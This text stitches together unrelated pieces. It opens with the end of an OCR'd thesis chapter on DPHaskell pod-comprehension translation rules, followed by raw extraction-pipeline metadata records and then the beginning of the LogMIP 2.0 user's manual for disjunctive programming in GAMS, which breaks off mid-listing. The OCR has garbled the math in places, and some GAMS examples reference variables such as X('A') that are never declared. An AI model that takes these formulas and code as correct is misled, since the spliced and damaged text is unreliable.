\text{case vec of} \] \[\text{MkPod mask } y \to \text{let } x = \text{indices mask} \] \[\text{in TPOD } [[\ll e \to q ] ] \text{ binds } [x \to x ; y \to y] \text{ mask} \] Rule-1 3.6.2 Indexed-from Indexed-from generators provide a mechanism of expressing communication in DPHaskell. They have non-strict semantics because elements are drawn from the pod on the right-hand side of the generator as required. We achieve this in translation rule 2 by using the non-strict properties of let expressions and irrefutable pattern matching (the \(\sim\) symbol used in the case expression of rule 2). Elements are 'logically' drawn from vec only when \(y\) is evaluated in an inner scope of the comprehension. Unlike rule 1, the defined processors of vec are not used to define the processors of the resulting comprehension. In other data-parallel languages a zip-like computation results in a parallel object whose extent is defined by the intersection of the argument objects. In DPHaskell, the resulting pod will have processors defined wherever they are defined in the drawn-from generator. Any further restrictions caused by the index generators depend upon the strictness characteristics of the functions that force the index generator's vector. This is achieved in rule 2 by suspending the "processor exists" check within the let Chapter 3. Laziness and parallel Data Structures expression identified by y. When y is forced, a fetch communication occurs that evaluates the index vector represented by the expression e f. This vector is then used to create the aim for evaluation of data'. Only at this point in the whole computation is the processor exists check performed, and data' evaluated. \[ \text{TPOD} \left[ \left[ \langle\langle e | \langle\langle \text{ef}; y \rangle \rangle \langle\langle \text{vec}, q \rangle \rangle \right] \{b_1 \rightarrow b_1 \ldots b_n \rightarrow b_n\} \text{mask} \right] = \text{case vec of} \right. \] \[ \sim(\text{MkPod mask'} \text{data'}) \rightarrow \] \[ \text{let y = fetch (mapn ('b_1 \ldots b_n \rightarrow \text{ef}) b_1 \ldots b_n) (map2 ('m \rightarrow \text{if m then d else } \perp) \text{mask'} \text{data'})} \] \[ \text{in TPOD} \left[ \left[ \langle\langle e | q \rangle \rangle \right] \{y \rightarrow y; b_1 \rightarrow b_1 \ldots b_n \rightarrow b_n\} \text{mask} \right] \] Rule 2 3.6.3 Filtering Translation rule 3 for filtering expressions is relatively straightforward. As a filter restricts those processors of the pod resulting from the comprehension, we apply the logical 'and' of the mask that represents the defined processors and the filtering expression. \[ \text{TPOD} \left[ \left[ \langle\langle e | \langle\langle \text{ef}, q \rangle \rangle \rangle \langle\langle \text{vec}, q \rangle \rangle \right] \{b_1 \rightarrow b_1 \ldots b_n \rightarrow b_n\} \text{mask} \right] = \text{TPOD} \left[ \left[ \langle\langle e | q \rangle \rangle \right] \{b_1 \rightarrow b_1 \ldots b_n \rightarrow b_n\} \right] \] \[ \left(\text{mapn+1 ('m \rightarrow b_1 \ldots b_n \rightarrow m \& \& \text{ef}) mask b_1 \ldots b_n} \right) \] Rule 3 Chapter 3. Laziness and parallel Data Structures 3.6.4 Left-hand side The base case for the translation scheme is shown in rule 4. An expression such an e1 in the index position of a processor represents a sending type communication. We apply such communication to the mask that represents the defined processors, and the expression e2 that represents the contents of those processors. This new mask and parallel object is finally used to recreate the user representation of a pod that encapsulates the meaning of the original pod comprehension. TPOD [[ << ([e1 ; e2 ] | >> ) ] (b1 → b1 . . . bn → bn) mask = let svec = mapn (\b1 . . . bn -> e1 ) b1 . . . bn in MkPod (send svec mask) (send svec ( mapn (\b1 . . . bn -> e2 ) b1 . . . bn )) Rule 4 fig 3.2 hinted at the possibility of simplifying communications expressed in terms of send into semantically equivalent communications using fetch. Rule 4 of TPOD always introduces a sending communication which, with a little effort, can be eliminated from the translated code. For example, in the translation below, the index vector svec used in both send operations is the vector created by the indices function. As the send communicates each processor’s contents to itself, the send primitive can be removed from the translated program. Chapter 3. Laziness and parallel Data Structures TPOD [[ << (lx; a&&b) | (lx; a) << vec, (lx-1; b) << vec, f x >> ]] [ ] <<...True...>> ⇒ case vec of MkPod mask a -> let x = indices mask in case vec of ~(MkPod mask' data') -> let y = fetch (map2(x a -> x -1) x a) (map2(m d -> if m then d else >) mask' data' in let svec = map3(b x a -> b x a) in MkPod (send svec (map4(m b x a -> m && f x) mask b x a)) (send svec (map3(b x a -> a && b) b x a)) simplify ⇒ case vec of MkPod mask a -> let x = indices mask in case vec of ~(MkPod mask' data') -> let y = fetch (map2(x a -> x -1) x a) (map2(m d -> if m then d else >) mask' data' in MkPod (map4(m b x a -> m && f x) mask b x a) (map3(b x a -> a && b) b x a) Chapter 3. *Laziness and parallel Data Structures* 3.7 Conclusions POD comprehensions provide a mechanism of expressing data-parallel computations. Using an evaluation strategy which maintains a record of the elements of a parallel object that need evaluating, data-parallelism and non-strictness can be incorporated in the same language. In practical terms this means we can ignore problems that arise from composing functions that perform computations over differing sized parallel data structures. By using infinite pods with functions such as mapPod, finite computations can be performed on the resulting 'glued' functions. Unlike existing data-parallel languages, pod comprehensions provide a single framework within which communication and parallelism can be expressed.
{"Source-Url": "http://shodhganga.inflibnet.ac.in:8080/jspui/bitstream/10603/192247/9/09_chapter_03.pdf", "len_cl100k_base": 12392, "olmocr-version": "0.1.50", "pdf-total-pages": 34, "total-fallback-pages": 0, "total-input-tokens": 77628, "total-output-tokens": 13926, "length": "2e13", "weborganizer": {"__label__adult": 0.00029587745666503906, "__label__art_design": 0.00026106834411621094, "__label__crime_law": 0.0002276897430419922, "__label__education_jobs": 0.00044083595275878906, "__label__entertainment": 6.300210952758789e-05, "__label__fashion_beauty": 0.00011622905731201172, "__label__finance_business": 0.0001742839813232422, "__label__food_dining": 0.0003466606140136719, "__label__games": 0.0005688667297363281, "__label__hardware": 0.0011882781982421875, "__label__health": 0.0003211498260498047, "__label__history": 0.00022220611572265625, "__label__home_hobbies": 9.375810623168944e-05, "__label__industrial": 0.0004529953002929687, "__label__literature": 0.00023472309112548828, "__label__politics": 0.00024700164794921875, "__label__religion": 0.0004301071166992187, "__label__science_tech": 0.0182342529296875, "__label__social_life": 6.371736526489258e-05, "__label__software": 0.004398345947265625, "__label__software_dev": 0.970703125, "__label__sports_fitness": 0.0002956390380859375, "__label__transportation": 0.00058746337890625, "__label__travel": 0.00019371509552001953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 52672, 0.01743]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 52672, 0.66807]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 52672, 0.86646]], "google_gemma-3-12b-it_contains_pii": [[0, 1396, false], [1396, 3118, null], [3118, 4497, null], [4497, 5976, null], [5976, 7598, null], [7598, 9039, null], [9039, 10587, null], [10587, 12219, null], [12219, 13981, null], [13981, 15773, null], [15773, 17493, null], [17493, 19105, null], [19105, 20843, null], [20843, 22528, null], [22528, 24225, null], [24225, 26032, null], [26032, 27420, null], [27420, 29260, null], [29260, 30729, null], [30729, 32908, null], [32908, 33913, null], [33913, 35355, null], [35355, 37198, null], [37198, 38887, null], [38887, 40469, null], [40469, 41986, null], [41986, 43615, null], [43615, 45161, null], [45161, 46604, null], [46604, 48064, null], [48064, 49851, null], [49851, 51146, null], [51146, 51895, null], [51895, 52672, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1396, true], [1396, 3118, null], [3118, 4497, null], [4497, 5976, null], [5976, 7598, null], [7598, 9039, null], [9039, 10587, null], [10587, 12219, null], [12219, 13981, null], [13981, 15773, null], [15773, 17493, null], [17493, 19105, null], [19105, 20843, null], [20843, 22528, null], [22528, 24225, null], [24225, 26032, null], [26032, 27420, null], [27420, 29260, null], [29260, 30729, null], [30729, 32908, null], [32908, 33913, null], [33913, 35355, null], [35355, 37198, null], [37198, 38887, null], [38887, 40469, null], [40469, 41986, null], [41986, 43615, null], [43615, 45161, null], [45161, 46604, null], [46604, 48064, null], [48064, 49851, null], [49851, 51146, null], [51146, 51895, null], [51895, 52672, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 52672, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 52672, null]], "pdf_page_numbers": [[0, 1396, 1], [1396, 3118, 2], [3118, 4497, 3], [4497, 5976, 4], [5976, 7598, 5], [7598, 9039, 6], [9039, 10587, 7], [10587, 12219, 8], [12219, 13981, 9], [13981, 15773, 10], [15773, 17493, 11], [17493, 19105, 12], [19105, 20843, 13], [20843, 22528, 14], [22528, 24225, 15], [24225, 26032, 16], [26032, 27420, 17], [27420, 29260, 18], [29260, 30729, 19], [30729, 32908, 20], [32908, 33913, 21], [33913, 35355, 22], [35355, 37198, 23], [37198, 38887, 24], [38887, 40469, 25], [40469, 41986, 26], [41986, 43615, 27], [43615, 45161, 28], [45161, 46604, 29], [46604, 48064, 30], [48064, 49851, 31], [49851, 51146, 32], [51146, 51895, 33], [51895, 52672, 34]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 52672, 0.0]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
18a49510c7c7bca30ef1b92cdb3aa6058c3098eb
[REMOVED]
{"Source-Url": "https://hal-ecp.archives-ouvertes.fr/hal-00782893/file/main.pdf", "len_cl100k_base": 15721, "olmocr-version": "0.1.53", "pdf-total-pages": 21, "total-fallback-pages": 0, "total-input-tokens": 82572, "total-output-tokens": 18872, "length": "2e13", "weborganizer": {"__label__adult": 0.0004379749298095703, "__label__art_design": 0.00077056884765625, "__label__crime_law": 0.00042724609375, "__label__education_jobs": 0.0042877197265625, "__label__entertainment": 0.00015044212341308594, "__label__fashion_beauty": 0.0002722740173339844, "__label__finance_business": 0.0006213188171386719, "__label__food_dining": 0.0005421638488769531, "__label__games": 0.001194000244140625, "__label__hardware": 0.00156402587890625, "__label__health": 0.00112152099609375, "__label__history": 0.0006661415100097656, "__label__home_hobbies": 0.0002589225769042969, "__label__industrial": 0.0009546279907226562, "__label__literature": 0.0010080337524414062, "__label__politics": 0.0004119873046875, "__label__religion": 0.0009136199951171876, "__label__science_tech": 0.349853515625, "__label__social_life": 0.00021207332611083984, "__label__software": 0.00908660888671875, "__label__software_dev": 0.62353515625, "__label__sports_fitness": 0.00034499168395996094, "__label__transportation": 0.0010471343994140625, "__label__travel": 0.0002956390380859375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 57745, 0.02368]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 57745, 0.66175]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 57745, 0.79683]], "google_gemma-3-12b-it_contains_pii": [[0, 963, false], [963, 3639, null], [3639, 6825, null], [6825, 10429, null], [10429, 13627, null], [13627, 16560, null], [16560, 19886, null], [19886, 23717, null], [23717, 26535, null], [26535, 29261, null], [29261, 32032, null], [32032, 33944, null], [33944, 37461, null], [37461, 39851, null], [39851, 42824, null], [42824, 45353, null], [45353, 48507, null], [48507, 51622, null], [51622, 54046, null], [54046, 57503, null], [57503, 57745, null]], "google_gemma-3-12b-it_is_public_document": [[0, 963, true], [963, 3639, null], [3639, 6825, null], [6825, 10429, null], [10429, 13627, null], [13627, 16560, null], [16560, 19886, null], [19886, 23717, null], [23717, 26535, null], [26535, 29261, null], [29261, 32032, null], [32032, 33944, null], [33944, 37461, null], [37461, 39851, null], [39851, 42824, null], [42824, 45353, null], [45353, 48507, null], [48507, 51622, null], [51622, 54046, null], [54046, 57503, null], [57503, 57745, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 57745, null]], "pdf_page_numbers": [[0, 963, 1], [963, 3639, 2], [3639, 6825, 3], [6825, 10429, 4], [10429, 13627, 5], [13627, 16560, 6], [16560, 19886, 7], [19886, 23717, 8], [23717, 26535, 9], [26535, 29261, 10], [29261, 32032, 11], [32032, 33944, 12], [33944, 37461, 13], [37461, 39851, 14], [39851, 42824, 15], [42824, 45353, 16], [45353, 48507, 17], [48507, 51622, 18], [51622, 54046, 19], [54046, 57503, 20], [57503, 57745, 21]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 57745, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
f275ade2cc83d5a4932b3ead1d4ae14e0f89ac91
LogMIP 2.0 USER’S MANUAL October 2011 By Aldo Vecchietti aldovec@santafe-conicet.gov.ar INDEX 1. Introduction........................................................................................................... 2 2. Disjunctive model formulation........................................................................... 3 2.1 SMALL EXAMPLE 1 .................................................................................. 4 2.2 SMALL EXAMPLE 2.................................................................................. 7 2.3 NONLINEAR EXAMPLE.......................................................................... 8 3. How to write a disjunctive model for LogMIP................................................. 12 3.1 Controlling disjunctions and constraints domain.............................. 15 3.2 Using a DUMMY Equation................................................................. 15 4. Logic Propositions.............................................................................................. 16 4.1 Declaration Sentence............................................................................... 16 4.2 Definition Sentence............................................................................... 16 5. Solvers.................................................................................................................. 16 5.1 Solution Algorithms for Linear Problems................................. 17 5.2 Solution Algorithms for Non-Linear Problems......................... 17 6. Recommendations and Limitations................................................................. 19 7. References............................................................................................................ 19 1. Introduction LogMIP 2.0 is a program for solving linear and nonlinear disjunctive programming problems involving binary variables and disjunction definitions for modeling discrete choices. While the modeling and solution of these disjunctive optimization problems has not yet reached the stage of maturity and reliability as LP, MIP and NLP: Disjunctive problems have a rich area of applications. LogMIP 2.0 has been developed by Dr. Aldo Vecchietti from INGAR (Santa Fe-Argentina), Professor Ignacio E. Grossmann from Carnegie Mellon University (Pittsburgh-USA) and the cooperation of GAMS’s staff. It becomes a progress from its previous version (LogMIP 1.0). PLEASE NOTE: - LogMIP 1.0, works for 22.6 (December 2007) until 23.6 (December 2010) GAMS releases. - LogMIP 2.0 is included from 23.7 GAMS release. LogMIP 1.0 does not work anymore from this release. - Changes in version 2.0 are at the level of language, where LogMIP now uses the EMP syntax and modeltype. - Solvers for linear disjunctive models (Imbigm and Imchul) are combined in one new called just logmip. - In this version, non-linear disjunctive models can be solved using Big-M and convex hull relaxations algorithms. - Non-linear solver Imboa (Logic-Based Outer Approximation) does not work in LogMIP 2.0, a new version is currently developed and will be ready for a next GAMS release. - LogMIP is composed of: - language sentences for the definition of disjunctions and logic constraints, and - solvers for linear and non-linear disjunctive models. These parts are linked to GAMS, becomes a subset of GAMS language and solvers respectively. LogMIP cannot be executed independently of GAMS system. - Besides of disjunction definitions, LogMIP needs the declaration and definitions of GAMS’s scalars, sets, tables, variables, constraints, equations, etc.; for the specifications and solution of a disjunctive problem. 2. Disjunctive model formulation The models for LogMIP have the following general formulation (Generalized Disjunctive Programming –GDP): \[ \begin{align*} \text{min} & \quad Z = \sum_{k} c_k + f(x) + d^T y \\ \text{s.t.} & \quad g(x) \leq 0 \\ & \quad r(x) + D y \leq 0 \\ & \quad Ay \leq a \\ & \quad \bigvee_{i \in D_k} \begin{bmatrix} Y_{ik} \\ h_{ik}(x) \leq 0 \\ c_k = y_{ik} \end{bmatrix} \quad k \in \text{SD} \\ & \quad \Omega(Y) = \text{True} \\ & \quad x \in \mathbb{R}^n, \ y \in \{0,1\}^n, \ Y \in \{\text{True, False}\}^m, \ c_k \geq 0 \end{align*} \] \(x, c_k\) are continuous variables, \\ \(y\) are binary variables \((0-1)\), \\ \(Y_{ik}\) are Boolean variables, to establish whether a disjunction term is true or false, \\ \(\Omega(Y)\) logic relationships between Boolean variables, \\ \(f(x)\) objective function, which can be linear or non-linear, \\ \(g(x)\) linear or non-linear inequalities/equalities independent of the discrete choices, \\ \(r(x) + Dy \leq 0\) mixed-integer inequalities/equalities that can contain linear or non-linear continuous terms (integer terms must be linear), \\ \(Ay \leq a\) linear integer inequalities/equalities \\ \(d^T y\) linear fixed cost terms. Before explaining the details about the sentences to pose a disjunctive problems and its solvers, in the next sections three small examples are presented in order to illustrate the meaning of the previous GDP formulation. The first two corresponds to linear models, the later to a nonlinear one. 2.1. SMALL EXAMPLE 1 This example corresponds to a Jobshop (Jobshop scheduling) problem, having three jobs (A,B,C) that must be executed sequentially in three steps (1,2,3), but not all jobs require all the stages, meaning that the jobs will be executed in a subset of stages. The processing time for each stage is given by the following table: <table> <thead> <tr> <th>Job</th> <th>stage</th> <th>1</th> <th>2</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>A</td> <td></td> <td>5</td> <td>-</td> <td>3</td> </tr> <tr> <td>B</td> <td></td> <td>-</td> <td>3</td> <td>2</td> </tr> <tr> <td>C</td> <td></td> <td>2</td> <td>4</td> <td>-</td> </tr> </tbody> </table> The objective is to obtain the sequence of task, which minimizes the completion time \( T \). In order to obtain a feasible solution the clashes between the jobs must be eliminated. For more details about this formulation see Raman y Grossmann (1994). LogMIP input file for this example First Version – Using 3 explicit binary variables BINARY VARIABLES Y1, Y2, Y3; POSITIVE VARIABLES XA, XB, XC, T; VARIABLE Z; EQUATIONS EQUAT1, EQUAT2, EQUAT3, EQUAT4, EQUAT5, EQUAT6, EQUAT7, EQUAT8, EQUAT9, DUMMY, OBJECTIVE; EQUAT1.. T =G= XA + 8; EQUAT2.. T =G= XB + 5; EQUAT3.. T =G= XC + 6; EQUAT4.. XA – XC + 5 =L= 0; EQUAT5.. XC – XA + 2 =L= 0; EQUAT6.. XB – XC + 1 =L= 0; EQUAT7.. XC – XB + 6 =L= 0; EQUAT8.. XA – XB + 5 =L= 0; EQUAT9.. XB - XA =L= 0; OBJECTIVE.. Z =E= T; XA.UP=20.; XB.UP=20.; XC.UP=20.; DUMMY.. Y1+Y2+Y3 =G= 0; $ONECHO > "%lm.info%" * by default the convex hull reformulation is used disjunction Y1 equat4 else equat5 disjunction Y2 equat6 else equat7 disjunction Y3 equat8 else equat9 * optional, if not set EMP will find the modelftype suitable modelftype mip $OFFECHO OPTION EMP = LOGMIP; Calls LogMIP solvers now belonging to the EMP environment OPTION OPTCR=0.0; MODEL SMALL11 /ALL/; SOLVE SMALL11 USING EMP MINIMIZING Z; EMP must be in the SOLVE sentence which includes LogMIP Second Version – Using default Boolean variables in disjunction definitions POSITIVE VARIABLES XA, XB, XC, T; VARIABLE Z; EQUATIONS EQUAT1, EQUAT2, EQUAT3, EQUAT4, EQUAT5, EQUAT6, EQUAT7, EQUAT8, EQUAT9, OBJECTIVE; EQUAT1.. T =G= XA + 8; EQUAT2.. T =G= XB + 5; EQUAT3.. T =G= XC + 6; EQUAT4.. XA - XC + 5 =L= 0; EQUAT5.. XC - XA + 2 =L= 0; EQUAT6.. XB - XC + 1 =L= 0; EQUAT7.. XC - XB + 6 =L= 0; EQUAT8.. X('A')-X('B')+ 5 =L= 0; EQUAT9.. X('B')-X('A') =L= 0; OBJECTIVE.. Z =E= T; XA.UP=20.; XB.UP=20.; XC.UP=20.; $ONECHO > "%lm.info%" default BigM disjunction * equat4 else equat5 disjunction * equat6 else equat7 disjunction * equat8 else equat9 * optional, if not set EMP will find the modeltype suitable modeltype mip $OFFECHO OPTION EMP = LOGMIP; Call to LogMIP solvers, now belonging to the EMP environment OPTION OPTCR=0.0; MODEL SMALL11 /ALL/; SOLVE SMALL11 USING EMP MINIMIZING Z; EMP must be in the SOLVE sentence. EMP includes LogMIP Constraints independent of discrete choices (disjunctions) Constraints for discrete choices (disjunctions) By means of this sentence LogMIP is forced to executed the BIGM relaxation method with default values of the M parameter Disjunction definitions according to the new (EMP) syntax rules. The * symbol is replaced by a default binary variable names in this case GAMS’s variable and equation declarations. NOTE THAT no binary variables are defined here because * is defined in disjunction’s section Note that a constraint belonging to a disjunction term is declared (given its name) in this section. SETS J JOBS / A, B, C / S STAGES / 1*3 / GG(J,J) Upper Triangle ALIAS (J,JJ),(S,SS); TABLE P(J,S) Processing Time 1 2 3 A 5 3 B 3 2 C 2 4 PARAMETER C(J,S) Stage Completion Time W(J,JJ) Maximum Pairwise Waiting Time PT(J) Total Processing Time BIG The Famous Big M; GG(J,JJ) = ORD(J) < ORD(JJ); C(J,S) = SUM(SS$(ORD(SS)<=ORD(S)), P(J,SS)); W(J,JJ) = SMAX(S, C(J,S) - C(JJ,S-1)); PT(J) = SUM(S, P(J,S)); BIG = SUM(J, PT(J)); VARIABLES T Completion Time X(J) Job Starting Time Y(J,JJ) Job Precedence POSITIVE VARIABLE X; BINARY VARIABLE Y; EQUATIONS COMP(J) Job Completion Time SEQ(J,JJ) Job Sequencing DUMMY; COMP(J).. T =G= X(J) + PT(J); SEQ(J,JJ)$$(ORD(J) <> ORD(JJ)).. X(J) + W(J,JJ) =L= X(JJ); DUMMY.. SUM(GG(J,JJ), Y(J,JJ)) =G= 0; X.UP(J) = BIG; MODEL SMALL13 / ALL /; file lg / '%lm.info%' /; put lg '* problem %gams.i%'; loop(gg(j,jj)$$(ord(j) <> ord(jj)), put /'disjunction' Y(j,jj) seq(j,jj) 'else' seq(jj,j)); putclose; OPTION EMP = LOGMIP; Calls LogMIP solvers, now belonging to the EMP environment OPTION OPTCR=0.0; MODEL SMALL11 /ALL/; SOLVE SMALL11 USING EMP MINIMIZING Z; NOTE THAT when a disjunction is defined over a domain, the elements expansion must be done by using file, put and loop or while GAMS sentences. The control over de domain is done through de the dollar sign $. Do not forget to include a line feed (/) when you write a new disjunction. 2.2. SMALL EXAMPLE 2 Small example for illustration purpose. It is composed by two disjunctions each one with two terms. Each term of the first disjunction is handled by different variables. The first term is true if \( Y_1 \) is true; the second term of the first disjunction is true if \( Y_2 \) is true. The second disjunction is handled just for one variable: \( Y_3 \). The first term apply if \( Y_3 \) is true, the second if \( Y_3 \) is false. The logic propositions indicates that: 1. If \( Y_1 \) is true and \( Y_2 \) false it implies that \( Y_3 \) must be false. 2. \( Y_2 \) and \( Y_3 \) cannot be both true at the same time. LogMIP input file for this example ``` SCALAR M /100/ BINARY VARIABLES Y1,Y2,Y3; POSITIVE VARIABLES X1,X2,X3, C; VARIABLE Z; EQUATIONS EQUAT1, EQUAT2, EQUAT3, EQUAT4, EQUAT5, EQUAT6, OBJECTIVE; EQUAT1.. X2 =L= X1 - 2; EQUAT2.. C =E= 5; EQUAT3.. X2 =G= 2; EQUAT4.. C =E= 7; EQUAT5.. X1-X2 =L= 1 ; EQUAT6.. X1 =E= M * Y3; Logic Equation L1,L2,L3; L1.. y1 and not y2 -> not y3; L2.. y2 -> not y3; L3.. y3 -> not y2; OBJECTIVE.. Z =E= C + 2*X('1') + X('2'); X.UP(J)=5; C.UP=7; $ONECHO > "%lm.info%" disjunction y1 equat1 equat2 elseif y2 equat3 equat4 disjunction y3 equat5 else equat6 $OFFECHO ``` NOTE THAT Logic Constraints are NOW declared (Logic Equation) and defined in the GAMS Section. GAMS has extended its Language Syntax to define this type of constraints observed the different syntax used to pose a two term disjunction; the first one where the terms are handled by two different variables (\( y_1 \) and \( y_2 \)); while the second one is handled by just one variable (\( y_3 \)), one term is satisfied by the TRUE value and the other with FALSE. 2.3. NON-LINEAR EXAMPLE Synthesis of 8 processes \[ \min Z = \sum_{k=1}^{8} c_k + a^T x + 122 \] Subject to: Mass Balances \[ \begin{align*} x_1 &= x_2 + x_4, x_6 = x_7 + x_8 \\ x_3 + x_5 &= x_6 + x_{11} \\ x_{11} &= x_{12} + x_{15}, x_{13} = x_{19} + x_{21} \\ x_9 + x_{16} + x_{25} &= x_{17} \\ x_{20} + x_{22} &= x_{23}, x_{23} = x_{14} + x_{24} \end{align*} \] Specifications \[ \begin{align*} x_{10} - 0.8x_{17} &\leq 0, x_{10} - 0.4x_{17} \geq 0 \\ x_{12} - 5x_{14} &\leq 0, x_{12} - 2x_{14} \geq 0 \end{align*} \] Disjunctions: \[ \begin{align*} &Y_1 \\ &\text{exp}(x_3) - 1 - x_2 \leq 0 \\ &c_1 = 5 \end{align*} \begin{align*} &\quad \lor \\ &x_3 = x_2 = 0 \\ &c_1 = 0 \end{align*} \] \[ \begin{align*} &Y_2 \\ &\text{exp}(x_3 / 1.2) - 1 - x_4 \leq 0 \\ &c_2 = 5 \end{align*} \begin{align*} &\quad \lor \\ &x_4 = x_5 = 0 \\ &c_2 = 0 \end{align*} \] \[ \begin{align*} &Y_3 \\ &1.5x_3 + x_{10} - x_8 = 0 \\ &c_3 = 6 \end{align*} \begin{align*} &\quad \lor \\ &x_9 = 0, x_8 = x_{10} \\ &c_3 = 0 \end{align*} \] \[ \begin{align*} &Y_4 \\ &1.25(x_{12} + x_{14}) - x_{13} = 0 \\ &c_4 = 10 \end{align*} \begin{align*} &\quad \lor \\ &x_{12} = x_{13} = x_{14} = 0 \\ &c_4 = 0 \end{align*} \] \[ \begin{align*} &Y_5 \\ &x_{15} - 2x_{16} = 0 \\ &c_5 = 6 \end{align*} \begin{align*} &\quad \lor \\ &x_{15} = x_{16} = 0 \\ &c_5 = 0 \end{align*} \] \[ \begin{align*} &Y_6 \\ &\text{exp}(x_{20} / 1.5) - 1 - x_{19} \leq 0 \\ &c_6 = 7 \end{align*} \begin{align*} &\quad \lor \\ &x_{19} = x_{20} = 0 \\ &c_6 = 0 \end{align*} \] \[ \begin{align*} &Y_7 \\ &\text{exp}(x_{22}) - 1 - x_{21} \leq 0 \\ &c_7 = 4 \end{align*} \begin{align*} &\quad \lor \\ &x_{21} = x_{22} = 0 \\ &c_7 = 0 \end{align*} \] \[ \begin{align*} &Y_8 \\ &\text{exp}(x_{18}) - 1 - x_{10} - x_{17} \leq 0 \\ &c_8 = 5 \end{align*} \begin{align*} &\quad \lor \\ &x_{10} = x_{17} = x_{18} = 0 \\ &c_8 = 0 \end{align*} \] Logic Propositions: \[ Y_1 \Rightarrow Y_3 \lor Y_4 \lor Y_6 \\ Y_2 \Rightarrow Y_3 \lor Y_4 \lor Y_5 \\ Y_3 \Rightarrow Y_1 \lor Y_2 \\ Y_5 \Rightarrow Y_8 \\ Y_4 \Rightarrow Y_1 \lor Y_2 \\ Y_4 \lor Y_6 \lor Y_7 \\ Y_6 \Rightarrow Y_1 \lor Y_2 \] \[ Y_5 \Rightarrow Y_3 \lor Y_5 \lor (\neg Y_3 \land \neg Y_5) \\ Y_4 \lor Y_2 \\ Y_4 \lor Y_5 \\ Y_6 \lor Y_7 \] TITLE APPLICATION OF THE LOGIC-BASED MINLP ALGORITHM IN EXAMPLE #3 * THE FORMULATION IS DISJUNCTIVE $OFFSYXREF $OFFSYMLIST * SELECT OPTIMAL PROCESS FROM WITHIN GIVEN SUPERSTRUCTURE. * SETS I PROCESS STREAMS / 1*25 / J PROCESS UNITS / 1*8 / PARAMETERS CV(I) VARIABLE COST COEFF FOR PROCESS UNITS - STREAMS / 3 = -10 , 5 = -15 , 9 = -40 , 19 = 25 , 21 = 35 , 25 = -35 17 = 80 , 14 = 15 , 10 = 15 , 2 = 1 , 4 = 1 , 18 = -65 20 = -60 , 22 = -80 / VARIABLES PROF PROFIT ; BINARY VARIABLES Y(J) ; POSITIVE VARIABLES X(I) , CF(J); EQUATIONS * EQUATIONS Independent of discrete choices * -------------------------------------------------------- MASSBAL1, MASSBAL2, MASSBAL3, MASSBAL4, MASSBAL5, MASSBAL6, MASSBAL7, MASSBAL8 SPECS1, SPECS2, SPECS3, SPECS4 * EQUATIONS allowing flow just IFF the unit EXISTS * ------------------------------------------------- LOGICAL1, LOGICAL2, LOGICAL3, LOGICAL4, LOGICAL5, LOGICAL6, LOGICAL7, LOGICAL8 * DISJUNCTION'S CONSTRAINTS and EQUATIONS * INOUT11, INOUT12, INOUT13, INOUT14 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 1 INOUT21, INOUT22, INOUT23, INOUT24 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 2 INOUT31, INOUT32, INOUT33, INOUT34 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 3 INOUT41, INOUT42, INOUT43, INOUT44, INOUT45 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 4 INOUT51, INOUT52, INOUT53, INOUT54 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 5 INOUT61, INOUT62, INOUT63, INOUT64 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 6 INOUT71, INOUT72, INOUT73, INOUT74 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 7 INOUT81, INOUT82, INOUT83, INOUT84, INOUT85, INOUT86 FOR PROCESS UNIT 8 OBJETIVO OBJECTIVE FUNCTION DEFINITION ; * BOUNDS SECTION: X.UP('5') = 2.0 ; 